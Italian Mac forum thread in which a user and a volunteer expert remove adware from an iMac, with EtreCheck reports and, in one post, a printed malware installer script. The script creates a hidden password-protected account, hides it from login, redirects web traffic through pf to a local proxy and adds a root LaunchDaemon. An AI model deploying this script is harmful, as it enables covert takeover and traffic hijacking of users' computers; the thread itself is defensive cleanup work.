Malware e adware sul mio mac

Tutto quello che riguarda OS X Mavericks 10.9

Moderatore: ModiMaccanici

bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: sab, 04 giu 2016 18:42

mi spiace ma ho cancellato tutto, tranne 4 file che non riesco a visualizzare ma che easyfind trova...

dentro etc non c'è più nulla con quei nomi, rimangono quelle 3 cartelle, anzi 4 :shock:
ora che le stavo ricontrollando ho visto che è cambiato il nome dei permessi di queste cartelle, invece di Zenonian è diventato "parolee" e ho visto che c'è una cartella "parolee" dentro var


qui sotto ti incollo il nuovo check fatto con etrecheck

EtreCheck version: 2.9.12 (265)
Report generated 2016-06-04 18:36:57
Download EtreCheck from https://etrecheck.com" onclick="window.open(this.href);return false;
Runtime 1:24
Performance: Excellent

Click the [Support] links for help with non-Apple products.
Click the [Details] links for more information about that line.

Problem: No problem - just checking

Hardware Information: ⓘ
27" iMac (Late 2013)
[Technical Specifications] - [User Guide] - [Warranty & Service]
iMac - model: iMac14,2
1 3.5 GHz Intel Core i7 CPU: 4-core
16 GB RAM Upgradeable - [Instructions]
BANK 0/DIMM0
8 GB DDR3 1600 MHz ok
BANK 1/DIMM0
8 GB DDR3 1600 MHz ok
BANK 0/DIMM1
Empty
BANK 1/DIMM1
Empty
Bluetooth: Good - Handoff/Airdrop2 supported
Wireless: en1: 802.11 a/b/g/n/ac

Video Information: ⓘ
NVIDIA GeForce GTX 780M - VRAM: 4096 MB
iMac 2560 x 1440

System Software: ⓘ
OS X Mavericks 10.9.5 (13F1808) - Time since boot: about one hour

Disk Information: ⓘ
APPLE SSD SM0256F disk0 : (251 GB) (Solid State - TRIM: Yes)
EFI (disk0s1) <not mounted> : 210 MB
Macintosh HD (disk0s2) / : 250.14 GB (56.99 GB free)
Recovery HD (disk0s3) <not mounted> [Recovery]: 650 MB

USB Information: ⓘ
Apple Inc. FaceTime HD Camera (Built-in)
Apple Inc. BRCM20702 Hub
Apple Inc. Bluetooth USB Host Controller

Thunderbolt Information: ⓘ
Apple Inc. thunderbolt_bus

Gatekeeper: ⓘ
Mac App Store and identified developers

Kernel Extensions: ⓘ
/Applications/Toast 11 Titanium/Spin Doctor.app
[not loaded] com.hzsystems.terminus.driver (4 - 2014-05-14) [Support]

/System/Library/Extensions
[loaded] com.nvidia.CUDA (1.1.0 - 2016-06-02) [Support]
[not loaded] com.roxio.BluRaySupport (1.1.6 - 2016-06-02) [Support]
[not loaded] com.sony.filesystem.prodisc_fs (2.3.2d12 - SDK 10.0 - 2016-06-02) [Support]
[not loaded] com.sony.protocol.prodisc (2.3.2d12 - SDK 10.0 - 2016-06-02) [Support]
[loaded] com.vara.driver.VaraAudio (1.0.3 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.1394HP (1.0.11 - SDK 10.4 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.1394_64HP (1.0.1 - SDK 10.6 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.USBHP (1.0.11 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.USB_64HP (1.0.0 - SDK 10.6 - 2016-06-02) [Support]
[not loaded] jp.panasonic.iokit.AJMPD1ProtocolService (1.0.1 - SDK 10.8 - 2016-06-02) [Support]
[not loaded] jp.panasonic.iokit.p2drivefamily (3.1.7 - SDK 10.7 - 2016-06-02) [Support]

/System/Library/Extensions/P2DriveFamilyDriver.kext/Contents/PlugIns
[not loaded] jp.panasonic.iokit.P2FireWireSBP2 (4.2.0 - SDK 10.7 - 2014-08-27) [Support]
[not loaded] jp.panasonic.iokit.PCD35Device (2.0.4 - SDK 10.7 - 2014-08-27) [Support]

~/Library/Services/ToastIt.service/Contents/MacOS
[not loaded] com.roxio.TDIXController (2.0 - 2014-05-14) [Support]

System Launch Agents: ⓘ
[not loaded] 4 Apple tasks
[loaded] 143 Apple tasks
[running] 37 Apple tasks

System Launch Daemons: ⓘ
[not loaded] 47 Apple tasks
[loaded] 141 Apple tasks
[running] 60 Apple tasks

Launch Agents: ⓘ
[not loaded] com.adobe.AAM.Updater-1.0.plist (2015-06-21) [Support]
[failed] com.adobe.ARMDCHelper.cc24aef4a1b90ed56a...plist (2016-06-02) [Support]
[loaded] com.divx.dms.agent.plist (2014-11-17) [Support]
[loaded] com.divx.update.agent.plist (2014-05-19) [Support]
[loaded] com.google.keystone.agent.plist (2016-04-07) [Support]
[loaded] com.nvidia.CUDASoftwareUpdate.plist (2016-06-04) [Support]
[loaded] com.panasonic.p2csvc.plist (2013-06-24) [Support]
[not loaded] com.teamviewer.teamviewer.plist (2015-03-02) [Support]
[not loaded] com.teamviewer.teamviewer_desktop.plist (2015-03-02) [Support]

Launch Daemons: ⓘ
[loaded] com.adobe.ARMDC.Communicator.plist (2016-06-02) [Support]
[loaded] com.adobe.ARMDC.SMJobBlessHelper.plist (2016-06-02) [Support]
[failed] com.adobe.fpsaud.plist (2016-05-10) [Support]
[loaded] com.apple.aelwriter.plist
[running] com.apple.qmaster.qmasterd.plist
[loaded] com.google.keystone.daemon.plist (2016-04-07) [Support]
[loaded] com.malwarebytes.MBAMHelperTool.plist (2016-06-04) [Support]
[loaded] com.noiseindustries.FxFactory.plist (2014-09-10) [Support]
[loaded] com.nvidia.cuda.launcher.plist (2014-09-26) [Support]
[loaded] com.teamviewer.Helper.plist (2015-03-02) [Support]
[not loaded] com.teamviewer.teamviewer_service.plist (2015-03-02) [Support]

User Launch Agents: ⓘ
[loaded] com.adobe.AAM.Updater-1.0.plist (2014-09-26) [Support]
[failed] com.adobe.ARM.[...].plist (2014-12-05) [Support]


Other Apps: ⓘ
[running] com.adobe.PDApp.AAMUpdatesNotifier.97536.13A57F93-A000-4EB5-843D-89B67668604D
[running] com.etresoft.EtreCheck.150864
[running] com.panasonic.p2csvc.156672
[running] org.grunenberg.EasyFind.203840
[loaded] 458 Apple tasks
[running] 256 Apple tasks

Internet Plug-ins: ⓘ
FlashPlayer-10.6: 21.0.0.242 - SDK 10.6 (2016-06-02) [Support]
QuickTime Plugin: 7.7.3 (2016-06-02)
AdobePDFViewerNPAPI: 15.016.20039 - SDK 10.11 (2016-05-03) [Support]
AdobePDFViewer: 15.016.20039 - SDK 10.11 (2016-05-03) [Support]
DivX Web Player: 3.2.4.1250 - SDK 10.6 (2014-11-26) [Support]
Flash Player: 21.0.0.242 - SDK 10.6 (2016-06-02) Cannot contact Adobe
Default Browser: 537 - SDK 10.9 (2014-09-24)
Google Earth Web Plug-in: 7.1 (2016-04-07) [Support]
OVSHelper: 1.1 (2014-11-26) [Support]
Silverlight: 4.0.60531.0 (2014-05-14) [Support]

User internet Plug-ins: ⓘ
Picasa: 1.0 - SDK 10.6 (2015-10-13) [Support]

Audio Plug-ins: ⓘ
DVCPROHDAudio: 1.3.2 (2014-05-14)

3rd Party Preference Panes: ⓘ
CUDA Preferences (2014-08-01) [Support]
Flash Player (2016-05-10) [Support]
Tuxera NTFS (2011-06-20) [Support]

Time Machine: ⓘ
Time Machine not configured!

Top Processes by CPU: ⓘ
5% fontd
2% WindowServer
2% kernel_task
1% Dock
1% p2csvc

Top Processes by Memory: ⓘ
908 MB kernel_task
180 MB com.apple.IconServicesAgent
164 MB Finder
98 MB WindowServer
82 MB mds_stores

Virtual Memory Information: ⓘ
13.00 GB Free RAM
3.03 GB Used RAM (1.35 GB Cached)
0 B Swap Used

Diagnostics Information: ⓘ
Jun 4, 2016, 05:01:41 PM Self test - passed
Jun 4, 2016, 05:01:21 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-170121_[redacted].crash
com.panasonic.p2csvc - /Users/Shared/*/p2csvc.app/Contents/MacOS/p2csvc
Jun 4, 2016, 03:01:11 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-150111_[redacted].crash
Jun 4, 2016, 12:52:28 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-125228_[redacted].crash
Jun 3, 2016, 07:22:19 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-03-192219_[redacted].crash
Jun 2, 2016, 11:46:29 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-234629_[redacted].crash
Jun 2, 2016, 06:43:15 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-184315_[redacted].crash
Jun 2, 2016, 06:35:39 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-183539_[redacted].crash
Jun 2, 2016, 03:53:08 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-155308_[redacted].crash
Jun 2, 2016, 01:25:06 AM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-012506_[redacted].crash
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: sab, 04 giu 2016 18:43

faxus ha scritto:Sei bravissima.

Buddology lo avevo scoperto.
Ma pensavo ci fosse solo un utente.
Invece sono due.

I permessi sono regolari, formalmente.

Comunque, conserva quel che puoi.
Vedo che non usi Time Machine, pessimo.
Ma hai altri backup dove potrebbe esserci copia?

no, mi faccio a mano la copia dei file importanti che tengo in doppia copia su altri hard disk esterni, ma del sistema non tengo nulla...
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: sab, 04 giu 2016 18:54

tra le cartelle dentro var ho trovato anche "waygoose" che è sempre utilizzato da "parolee" e poi c'è "jabberd" che ha come utenti con permessi di lettura e scrittura e solo lettura 2 " _jabber"

e guardando dentro tmp ho trovato una cartella nominata "injector10052016" con dentro altri file tra cui setupinjector.sh (creato il 6 maggio 2016) con questi comandi:


#!/bin/sh
updf="/var/tmp/updt.txt"

# get random names
n=$(cat /usr/share/dict/words | wc -l)

companyName=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $companyName

# create hidden user
HIDDEN_USER=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $HIDDEN_USER >> $updf
userName=$HIDDEN_USER

preferencesFileName="com."
preferencesFileName+=$companyName
preferencesFileName+=".plist"
echo $preferencesFileName >> $updf

netPreferencesFileName="com."
netPreferencesFileName+=$companyName
netPreferencesFileName+=".plist"
echo $netPreferencesFileName >> $updf

settingsFileName=$companyName
settingsFileName+=".sh"

configFileName=$companyName
configFileName+=".conf"

settingsFileData="#!/bin/sh\n\
\n\
if [ -a /Library/"$companyName"/Contents/MacOS/"$companyName" ];\n\
then\n\
sleep 10\n\
sudo pfctl -evf /etc/"$configFileName"\n\
sudo -u "$userName" /Library/"$companyName"/Contents/MacOS/"$companyName"\n\
fi\n\
exit 0\n"
echo "$settingsFileData" > /etc/$settingsFileName
sudo chown root /etc/$settingsFileName
sudo chmod 755 /etc/$settingsFileName

# copy files
sudo cp -r Injector.app $companyName
sudo cp -r $companyName /Library
sudo rm -r $companyName
sudo chmod -R 755 "/Library/"$companyName

#change name of the exe
sudo mv "/Library/"$companyName"/Contents/MacOS/Injector" "/Library/"$companyName"/Contents/MacOS/"$companyName

#configure hidden account
HIDDEN_PASS=test
HIDDEN_UID=401
HIDDEN_NAME="User "$HIDDEN_USER

HIDDEN_HOME="/var/$HIDDEN_USER"

sudo dscl . -create /Users/$HIDDEN_USER UniqueID $HIDDEN_UID
sudo dscl . -create /Users/$HIDDEN_USER PrimaryGroupID 20
sudo dscl . -create /Users/$HIDDEN_USER NFSHomeDirectory "$HIDDEN_HOME"
sudo dscl . -create /Users/$HIDDEN_USER UserShell /bin/bash
sudo dscl . -create /Users/$HIDDEN_USER RealName "$HIDDEN_NAME"
sudo dscl . -passwd /Users/$HIDDEN_USER $HIDDEN_PASS
sudo mkdir "$HIDDEN_HOME"
sudo chown -R $HIDDEN_USER "$HIDDEN_HOME"
sudo chmod a+rwx "/Library/"$companyName"/Contents/MacOS/"$companyName

# Enable the Hide500Users attribute
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES

# read parameters
dist_channel_id=$1
machine_id=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
click_id=$2
domain=$3

if [ -z "$dist_channel_id" ];
then
echo "Default for dist channel" >> $updf
dist_channel_id="A1000"
fi

if [ -z "$click_id" ];
then
echo "Default for click id" >> $updf
click_id="0"
fi

if [ -z "$domain" ];
then
echo "Default for domain"
domain="http://aadcd15734d97346bb85f545dc8ca03e7e.com"
fi

# write parameters to preferences file
sudo defaults write "/Library/Preferences/"$preferencesFileName dist_channel_id "$dist_channel_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName machine_id "$machine_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName click_id "$click_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName domain "$domain"
sudo plutil -convert xml1 "/Library/Preferences/"$preferencesFileName

# INSTALL SERVER
# set redirections
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
echo "$pfData" > /etc/$configFileName

# run server
sudo cp com.pref.plist "/Library/LaunchDaemons/"$netPreferencesFileName
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName Label "$netPreferencesFileName"
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName ProgramArguments -array '/etc/'$settingsFileName''
sudo chmod 755 "/Library/LaunchDaemons/"$netPreferencesFileName
sudo launchctl load -w "/Library/LaunchDaemons/"$netPreferencesFileName

else
echo "Unable to find active interface" >> $updf
exit 1
fi

exit 0
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: sab, 04 giu 2016 19:19

secondo te ora mi posso connettere a internet?

tengo comunque sotto controllo la libreria e il monitoraggio attività per vedere se ricompare qualcosa...

e le cartelle vuote dentro private/var/ le cancello?


ah... e mi rimangono quei 4 file 2 dei quali dentro private/var/tmp e che però non riesco a vedere..... sai come posso trovarli e buttarli?
faxus
Pro-Expert 
Pro-Expert 
Avatar utente
Iscritto il: lun, 02 giu 2014 15:12
Messaggi: 26840
Località: Tra bufale e mare
Contatta:

Top

Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: sab, 04 giu 2016 20:54

bendis ha scritto:tra le cartelle dentro var ho trovato anche "waygoose" che è sempre utilizzato da "parolee" e poi c'è "jabberd" che ha come utenti con permessi di lettura e scrittura e solo lettura 2 " _jabber"

e guardando dentro tmp ho trovato una cartella nominata "injector10052016" con dentro altri file tra cui setupinjector.sh (creato il 6 maggio 2016) con questi comandi...
Elimina waygoose, ma fanne una copia.
Per Jabber sono indeciso fanne una copia in più e mettila in una cartella sulla scrivania, oltre quella per me.
Fatto sta che jabber dovrebbe essere in /private/var e non in /private/etc.

Gli utenti creati sono invisibili perché hanno un ID inferiore a 500.
Per impostazione predefinita in OS X gli utenti con password di login vengono mostrati da ID 500 in su.
Per esempio l'utente principale ha solitamente ID 501, oppure 502 e 503 ecc, se sono più utenti.

Grazie per aver postato lo script
bendis ha scritto:secondo te ora mi posso connettere a internet?...
Fallo, dopo aver cancellato le ultime cose
bendi ha scritto:... le cartelle vuote dentro private/var/ le cancello?...
Sì, certo
bendis ha scritto:... e mi rimangono quei 4 file 2 dei quali dentro private/var/tmp e che però non riesco a vedere..... sai come posso trovarli e buttarli?

Codice: Seleziona tutto

defaults write com.apple.finder AppleShowAllFiles TRUE && killall Finder
Poi dopo che li hai visti e cancellati

Codice: Seleziona tutto

defaults write com.apple.finder AppleShowAllFiles FALSE && killall Finder
Non devi avere download o backup in corso

Mandami un messaggio privato cliccando sull'icona della busta, qui sotto, indicando il link per scaricare la cartella con quello che hai potuto salvare.
Mettila su DropBox, o dove vuoi, possibilmente zippata, e inviami il link per scaricarla.
Grazie mille
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 09:33

non ho capito se injector va eliminato o no....
faxus
Pro-Expert 
Pro-Expert 
Avatar utente
Iscritto il: lun, 02 giu 2014 15:12
Messaggi: 26840
Località: Tra bufale e mare
Contatta:

Top

Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 10:29

Tutto.
vedi se trovi anche il file invisibile
./setupInjector.sh

Ripetei un check, per favore.

Ho ricevuto il pacchetto, grazie.

Incredibile...

Immagine
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 10:52

sì sì, è nello zip che ti ho inviato

cos'è quell'immagine che hai postato? il com.apple.LaunchServices.plist?
devo trovare anche quello e eliminarlo?

ah, nella cartella ti ho messo anche uno zip chiamato dit8.tgz: cos'è? devo eliminare anche quello?
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 10:57

ecco il check:



EtreCheck version: 2.9.12 (265)
Report generated 2016-06-05 10:54:19
Download EtreCheck from https://etrecheck.com" onclick="window.open(this.href);return false;
Runtime 1:20
Performance: Excellent

Click the [Support] links for help with non-Apple products.
Click the [Details] links for more information about that line.

Problem: No problem - just checking

Hardware Information: ⓘ
27" iMac (Late 2013)
[Technical Specifications] - [User Guide] - [Warranty & Service]
iMac - model: iMac14,2
1 3.5 GHz Intel Core i7 CPU: 4-core
16 GB RAM Upgradeable - [Instructions]
BANK 0/DIMM0
8 GB DDR3 1600 MHz ok
BANK 1/DIMM0
8 GB DDR3 1600 MHz ok
BANK 0/DIMM1
Empty
BANK 1/DIMM1
Empty
Bluetooth: Good - Handoff/Airdrop2 supported
Wireless: en1: 802.11 a/b/g/n/ac

Video Information: ⓘ
NVIDIA GeForce GTX 780M - VRAM: 4096 MB
iMac 2560 x 1440

System Software: ⓘ
OS X Mavericks 10.9.5 (13F1808) - Time since boot: about one hour

Disk Information: ⓘ
APPLE SSD SM0256F disk0 : (251 GB) (Solid State - TRIM: Yes)
EFI (disk0s1) <not mounted> : 210 MB
Macintosh HD (disk0s2) / : 250.14 GB (56.72 GB free)
Recovery HD (disk0s3) <not mounted> [Recovery]: 650 MB

USB Information: ⓘ
Apple Inc. FaceTime HD Camera (Built-in)
Apple Inc. BRCM20702 Hub
Apple Inc. Bluetooth USB Host Controller

Thunderbolt Information: ⓘ
Apple Inc. thunderbolt_bus

Gatekeeper: ⓘ
Mac App Store and identified developers

Kernel Extensions: ⓘ
/Applications/Toast 11 Titanium/Spin Doctor.app
[not loaded] com.hzsystems.terminus.driver (4 - 2014-05-14) [Support]

/System/Library/Extensions
[loaded] com.nvidia.CUDA (1.1.0 - 2016-06-02) [Support]
[not loaded] com.roxio.BluRaySupport (1.1.6 - 2016-06-02) [Support]
[not loaded] com.sony.filesystem.prodisc_fs (2.3.2d12 - SDK 10.0 - 2016-06-02) [Support]
[not loaded] com.sony.protocol.prodisc (2.3.2d12 - SDK 10.0 - 2016-06-02) [Support]
[loaded] com.vara.driver.VaraAudio (1.0.3 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.1394HP (1.0.11 - SDK 10.4 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.1394_64HP (1.0.1 - SDK 10.6 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.USBHP (1.0.11 - 2016-06-02) [Support]
[not loaded] com.wdc.driver.USB_64HP (1.0.0 - SDK 10.6 - 2016-06-02) [Support]
[not loaded] jp.panasonic.iokit.AJMPD1ProtocolService (1.0.1 - SDK 10.8 - 2016-06-02) [Support]
[not loaded] jp.panasonic.iokit.p2drivefamily (3.1.7 - SDK 10.7 - 2016-06-02) [Support]

/System/Library/Extensions/P2DriveFamilyDriver.kext/Contents/PlugIns
[not loaded] jp.panasonic.iokit.P2FireWireSBP2 (4.2.0 - SDK 10.7 - 2014-08-27) [Support]
[not loaded] jp.panasonic.iokit.PCD35Device (2.0.4 - SDK 10.7 - 2014-08-27) [Support]

~/Library/Services/ToastIt.service/Contents/MacOS
[not loaded] com.roxio.TDIXController (2.0 - 2014-05-14) [Support]

System Launch Agents: ⓘ
[not loaded] 4 Apple tasks
[loaded] 147 Apple tasks
[running] 33 Apple tasks

System Launch Daemons: ⓘ
[not loaded] 47 Apple tasks
[loaded] 143 Apple tasks
[running] 58 Apple tasks

Launch Agents: ⓘ
[not loaded] com.adobe.AAM.Updater-1.0.plist (2015-06-21) [Support]
[failed] com.adobe.ARMDCHelper.cc24aef4a1b90ed56a...plist (2016-06-02) [Support]
[loaded] com.divx.dms.agent.plist (2014-11-17) [Support]
[loaded] com.divx.update.agent.plist (2014-05-19) [Support]
[loaded] com.google.keystone.agent.plist (2016-04-07) [Support]
[loaded] com.nvidia.CUDASoftwareUpdate.plist (2016-06-05) [Support]
[loaded] com.panasonic.p2csvc.plist (2013-06-24) [Support]
[not loaded] com.teamviewer.teamviewer.plist (2015-03-02) [Support]
[not loaded] com.teamviewer.teamviewer_desktop.plist (2015-03-02) [Support]

Launch Daemons: ⓘ
[loaded] com.adobe.ARMDC.Communicator.plist (2016-06-02) [Support]
[loaded] com.adobe.ARMDC.SMJobBlessHelper.plist (2016-06-02) [Support]
[failed] com.adobe.fpsaud.plist (2016-05-10) [Support]
[loaded] com.apple.aelwriter.plist
[running] com.apple.qmaster.qmasterd.plist
[loaded] com.google.keystone.daemon.plist (2016-04-07) [Support]
[loaded] com.malwarebytes.MBAMHelperTool.plist (2016-06-04) [Support]
[loaded] com.noiseindustries.FxFactory.plist (2014-09-10) [Support]
[loaded] com.nvidia.cuda.launcher.plist (2014-09-26) [Support]
[loaded] com.teamviewer.Helper.plist (2015-03-02) [Support]
[not loaded] com.teamviewer.teamviewer_service.plist (2015-03-02) [Support]

User Launch Agents: ⓘ
[loaded] com.adobe.AAM.Updater-1.0.plist (2014-09-26) [Support]
[failed] com.adobe.ARM.[...].plist (2014-12-05) [Support]


Other Apps: ⓘ
[running] com.adobe.PDApp.AAMUpdatesNotifier.97536.0AAF6E99-0226-4149-ABF1-E4E8058268F2
[running] com.etresoft.EtreCheck.150864
[running] org.grunenberg.EasyFind.203840
[running] org.mozilla.firefox.31536
[loaded] 447 Apple tasks
[running] 247 Apple tasks

Internet Plug-ins: ⓘ
FlashPlayer-10.6: 21.0.0.242 - SDK 10.6 (2016-06-02) [Support]
QuickTime Plugin: 7.7.3 (2016-06-02)
AdobePDFViewerNPAPI: 15.016.20039 - SDK 10.11 (2016-05-03) [Support]
AdobePDFViewer: 15.016.20039 - SDK 10.11 (2016-05-03) [Support]
DivX Web Player: 3.2.4.1250 - SDK 10.6 (2014-11-26) [Support]
Flash Player: 21.0.0.242 - SDK 10.6 (2016-06-02) Cannot contact Adobe
Default Browser: 537 - SDK 10.9 (2014-09-24)
Google Earth Web Plug-in: 7.1 (2016-04-07) [Support]
OVSHelper: 1.1 (2014-11-26) [Support]
Silverlight: 4.0.60531.0 (2014-05-14) [Support]

User internet Plug-ins: ⓘ
Picasa: 1.0 - SDK 10.6 (2015-10-13) [Support]

Audio Plug-ins: ⓘ
DVCPROHDAudio: 1.3.2 (2014-05-14)

3rd Party Preference Panes: ⓘ
CUDA Preferences (2014-08-01) [Support]
Flash Player (2016-05-10) [Support]
Tuxera NTFS (2011-06-20) [Support]

Time Machine: ⓘ
Time Machine not configured!

Top Processes by CPU: ⓘ
6% fontd
3% firefox
3% WindowServer
2% kernel_task
1% Dock

Top Processes by Memory: ⓘ
874 MB kernel_task
868 MB firefox
147 MB com.apple.IconServicesAgent
98 MB mds_stores
98 MB WindowServer

Virtual Memory Information: ⓘ
11.00 GB Free RAM
4.72 GB Used RAM (1.58 GB Cached)
0 B Swap Used

Diagnostics Information: ⓘ
Jun 5, 2016, 09:24:44 AM Self test - passed
Jun 4, 2016, 11:59:11 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-235911_[redacted].crash
com.panasonic.p2csvc - /Users/Shared/*/p2csvc.app/Contents/MacOS/p2csvc
Jun 4, 2016, 05:01:21 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-170121_[redacted].crash
Jun 4, 2016, 03:01:11 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-150111_[redacted].crash
Jun 4, 2016, 12:52:28 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-04-125228_[redacted].crash
Jun 3, 2016, 07:22:19 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-03-192219_[redacted].crash
Jun 2, 2016, 11:46:29 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-234629_[redacted].crash
Jun 2, 2016, 06:43:15 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-184315_[redacted].crash
Jun 2, 2016, 06:35:39 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-183539_[redacted].crash
Jun 2, 2016, 03:53:08 PM ~/Library/Logs/DiagnosticReports/p2csvc_2016-06-02-155308_[redacted].crash
Scialla
iOS Expert
iOS Expert
Avatar utente
Iscritto il: mer, 12 ago 2009 19:27
Messaggi: 16612
Località: Torino
Oggetto del messaggio: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 11:43

Mai vista una roba simile!!!
Incredibile!!!
Sarebbe utile capire il fine di tutto ciò!
 Il futuro (Apple)? Nammerda!

Di un costoso Mac si può fare a meno, di macOS no... (cit. fax)
faxus
Pro-Expert 
Pro-Expert 
Avatar utente
Iscritto il: lun, 02 giu 2014 15:12
Messaggi: 26840
Località: Tra bufale e mare
Contatta:

Top

Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 11:46

bendis ha scritto:sì sì, è nello zip che ti ho inviato

cos'è quell'immagine che hai postato? il com.apple.LaunchServices.plist?
devo trovare anche quello e eliminarlo?

ah, nella cartella ti ho messo anche uno zip chiamato dit8.tgz: cos'è? devo eliminare anche quello?
Elimina tutto, escuso jabber

L'immagine appartiene ad una cartella presente nello zip
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 12:03

nella cartella private/var/tmp ho le cose che vedi nell'immagine, cos'è quel VSInstaller? ti invio anche quello o è normale che stia lì?
Allegati
private_var_tmp.jpg
private_var_tmp.jpg (97.94 KiB) Visto 4114 volte
faxus
Pro-Expert 
Pro-Expert 
Avatar utente
Iscritto il: lun, 02 giu 2014 15:12
Messaggi: 26840
Località: Tra bufale e mare
Contatta:

Top

Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 12:14

Il resto appare ora decente.

Con calma faremo un po' di pulizia.
Oggi ho molto da fare.

Intanto, però, subito:
Elimina il software Panasonic, se proprio ti serve dopo lo potrai reinstallare aggiornato e compatibile.
Il software TeamViewer
viewtopic.php?f=2&t=37927" onclick="window.open(this.href);return false;

Poi fai un bel backup, come hai promesso.
Il resto dopo


EDIT, vedo il tuo messaggio!

La mia cartella top è vuota.
Mi sembra tutto sospetto il contenuto.
Sicuramente sono fasulli da copiare in una cartella per me e da eliminare:

_MACOS
VsInstaller di tutti i tipi
com.vsearch.sock
tutti i tmp sfusi e icl

Non so la cartella launchd (che non dovrebbe stare lì)
Ma è protetta, vedi se riesci a vedere il contenuto aprendola con i permessi di amministrazione

Poi indaga sul contenuto di systemstats
faxus
Pro-Expert 
Pro-Expert 
Avatar utente
Iscritto il: lun, 02 giu 2014 15:12
Messaggi: 26840
Località: Tra bufale e mare
Contatta:

Top

Oggetto del messaggio: Re: Malware e adware sul mio mac

Messaggio Inviato: dom, 05 giu 2016 12:29

Scialla ha scritto:Mai vista una roba simile!!!
Incredibile!!!
Sarebbe utile capire il fine di tutto ciò!
Hai visto?

Sto indagando, penso ne farò un articolo per la home, appena sento Franz.
Ne avevo avuto avvisaglie in un blog specialistico letto giorni fa ed ero molto preoccupato.

In pratica stanno realizzando un processo malware a fini adware molto potente.
Il meccanismo crea degli utenti amministratori nascosti.
Con la loro password riescono a fare ciò che vogliono.

La cosa preoccupante è che il meccanismo è uguale a quello di un virus per Windows.

Le cartelle si replicano, e producono un mare di documenti che è impossible raccogliere in modo automatico.
Sono tutti nomi creati a caso, ma ognuno si riproduce con un installer e ricrea un nuovo meccanismo riproducendosi.

Alcuni elementi assumono un nome di preferenza Apple e su quelle ruota il sistema di propagazione.

Quando qualcuno si accorgerà che questo sistema e comincerà a:

1) prendere il nome di dominio alternativo ad Apple, come ad esempio Adobe o Google.
Cioè invece che com.apple.LauncService.plist che io so che non esiste, ma com.adobe.setAAM.plist o con.google.updAuth.plist, che chi lo sa cosa sono, come faremo?

2) invece di fare apparire ads e rallentare il sistema, a bloccare l'account, rubare password e cancellare dati

Cosa faremo?

Questo, a mio parere, se Apple non fa qualcosa, è inizio dei virus su OS X
bendis
Maccanico attivo
Maccanico attivo
Iscritto il: sab, 04 giu 2016 15:41
Messaggi: 271
Oggetto del messaggio: Re: Malware e adware sul mio mac

